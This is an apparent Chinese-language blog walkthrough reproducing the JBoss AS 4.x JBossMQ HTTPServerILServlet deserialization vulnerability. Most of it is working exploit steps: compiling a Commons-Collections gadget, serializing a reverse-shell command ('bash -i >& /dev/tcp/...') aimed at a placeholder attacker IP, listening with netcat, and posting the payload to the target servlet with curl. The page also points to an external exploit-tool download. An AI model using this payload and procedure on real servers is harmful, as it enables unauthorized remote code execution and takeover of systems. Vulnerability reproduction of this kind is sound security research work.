原理

JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

影响版本

JBoss AS 4.x及之前版本

漏洞复现

攻击机:xx.xx.xx.xx
靶机:x.x.x.x
靶机搭建和exp工具-->https://www.roaing.com/jboss12149.html

反弹shell
编译并生成序列化数据,生成ExampleCommonsCollections1WithHashMap.class文件

javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java

序列化恶意数据至文件,生成ExampleCommonsCollections1WithHashMap.ser文件

java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "bash -i >& /dev/tcp/xx.xx.xx.xx/9963 0>&1"
注:xx.xx.xx.xx是攻击者IP,端口为反弹shell端口

攻击机监听9963端口

nc -lvnp 9963

ExampleCommonsCollections1WithHashMap.ser发送到靶机

curl http://http://x.x.x.x:9700/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser
--data-binary 以二进制的方式post数据

发送成功,获取反弹shell。
7742.jpg
61536.jpg

最后修改:2021 年 11 月 02 日 02 : 45 PM
如果觉得我的文章对你有用,请随意赞赏